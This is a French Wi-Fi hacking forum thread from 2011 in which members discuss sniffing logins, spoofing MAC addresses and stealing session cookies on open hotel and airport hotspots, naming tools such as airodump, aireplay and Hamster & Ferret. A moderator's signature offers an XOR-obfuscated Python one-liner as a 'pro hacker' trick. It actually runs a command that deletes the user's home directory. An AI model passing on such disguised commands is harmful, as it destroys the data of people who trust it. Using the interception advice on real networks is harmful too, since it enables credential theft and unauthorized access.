Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 14-05-2011 23:30:40

iautran
Membre Radioactif
Inscription : 01-07-2010
Messages : 85

Un point sur les hotspots dans les hotels/aeroports etc...

Hello,

le sujet peut paraitre noob au premier abord mais je vais m'expliquer.

Je me posais la question de savoir si les hotspots dans les hôtels, aéroports sont généralement sécurisés ?

Reprenez-moi si je me trompe mais pour moi, les hotspots dans les hôtels/aéroports sont généralement de type "Open", ce qui signifie donc que le flux circule en clair et peut être intercepté par n'importe qui, authentifié ou pas sur ce réseau.
Jusqu'ici vous êtes d'accord avec moi ?

La plupart du temps, l'authentification sur ce type de hotspot se fait via un formulaire sur une page web; et une fois authentifié l'accès au web se fait.

Je me posais donc les questions suivantes :

1. Si le flux circule en clair, et comme l'authentification se fait dans 99% des cas en HTTP, si on sniff (depuis un poste non authentifié) l'authentification d'un utilisateur inscrit, on aura donc son login et mot de passe et nous pourrons nous connecter au hotspot ?

2. Dans la mesure où l'authentification ouvre un accès à un instant T, même si l'attaquant ne sniffait pas au moment de l'authentification, s'il sniffe une session existante active, il verra passer l'IP et l'adresse MAC d'un client authentifié, qu'il pourra alors également utiliser ?

Merci pour vos lumières !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-06-2011 17:09:32

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Un point sur les hotspots dans les hotels/aeroports etc...

1. Si le flux circule en clair et qu'un utilisateur malveillant :          ←        [img align=L]http://www.sachsreport.com/napster%20p2p%20riaa%20mp3%20pirate.jpg[/img] écoute, oui, on peut choper le login et le mot de passe.
Sauf si le code est transmis en mode "challenge" : le client n'envoie qu'un effondrement MD5 ou autre du mot de passe, et la box vérifie qu'elle a le même.
Cela peut arriver, par exemple si on donne des tickets à l'accueil du lieu où le WiFi est proposé.
Dans ce cas, le flux peut ne pas circuler en clair, et sans le mot de passe, game over.

2. Si l'attaquant sniffe l'adresse MAC (par exemple grâce à airodump la bien nommée), il pourra la "spoofer" (usurper en français) et se faire passer pour elle. (aireplay le rapide est ton ami)
L'ip, ca se récupère dans les en-tête des paquets, je ne suis pas sur que ça soit toujours ni aisément récupérable, ni utile. (une petite pensée pour Wireshark aux grands pieds[cf 'berthe aux grands pieds'(y'en a qui ont des noms classe. et y'a les autres.:D)])

Pour la récupération de l'ip, d'autres pourront t'expliquer avec les bons mots.

Bilan : si le réseau est open et non crypté, c'est game over pour les clients direct. (les cookies, ça se mange)

Dernière modification par spawn (05-06-2011 17:33:40)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 05-06-2011 18:36:46

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Un point sur les hotspots dans les hotels/aeroports etc...

[Ceci est une copie de ma réponse du 15 mai, effacée suite à la récente perte de données]

Salut !

Un réseau WiFi en OPN ne peut pas être considéré comme sûr. Dans le cas des hotspots "publics" le risque est encore plus important puisque tu ne sais pas qui y est connecté en même temps que toi.

Reprenez-moi si je me trompe mais pour moi, les hotspots dans les hôtels/aéroports sont généralement de type "Open", ce qui signifie donc que le flux circule en clair et peut être intercepté par n'importe qui, authentifié ou pas sur ce réseau.
Jusqu'ici vous êtes d'accord avec moi ?

Complètement d'accord (sauf si tu utilises un tunnel/VPN qui chiffre le trafic, mais ça reste rare).

1. Si le flux circule en clair, et comme l'authentification se fait dans 99% des cas en HTTP, si on sniff (depuis un poste non authentifié) l'authentification d'un utilisateur inscrit, on aura donc son login et mot de passe et nous pourrons nous connecter au hotspot ?

Là ça va dépendre du hotspot. Il y en a toute une série sur lesquels ça marchera mais ce n'est pas une généralité. Certains n'envoient qu'une forme hachée des infos de connexion, d'autres font une authentification en HTTPS, donc il y a des solutions possibles. Par contre, une fois que tu as le login et le mot de passe, tu ne pourras sans doute pas te connecter au réseau en même temps que l'utilisateur légitime, il faudra attendre qu'il se déconnecte (ou le dégager manuellement du réseau big_smile).

2. Dans la mesure où l'authentification ouvre un accès à un instant T, même si l'attaquant ne sniffait pas au moment de l'authentification, s'il sniffe une session existante active, il verra passer l'IP et l'adresse MAC d'un client authentifié, qu'il pourra alors également utiliser ?

Il y aura probablement un problème si 2 machines se retrouvent avec la même IP et la même adresse MAC au même moment sur le réseau. Donc ça va dépendre de la "susceptibilité" du point d'accès wink Attention, parfois la phase de connexion envoie un cookie au navigateur juste après l'authentification, donc si tu ne l'as pas tu ne pourras pas surfer même si tu as la bonne IP/MAC. Par contre, dans ces cas-là ça veut dire aussi que tu pourrais sniffer le cookie (ex : Wifizoo, Hamster & Ferret,...) au moment de la connexion smile

Attention, ceci ne s'applique (je pense) pas aux "hotspots" fournis par les opérateurs (Free, Neuf, Orange, Bouygues) via les box des abonnés. Là, je pense que l'authentification se fait à distance (sans doute en HTTPS) donc c'est plus difficile de choper le login. Par contre, si le réseau est en OPN, tu peux encore sniffer une bonne partie du trafic...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.021 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]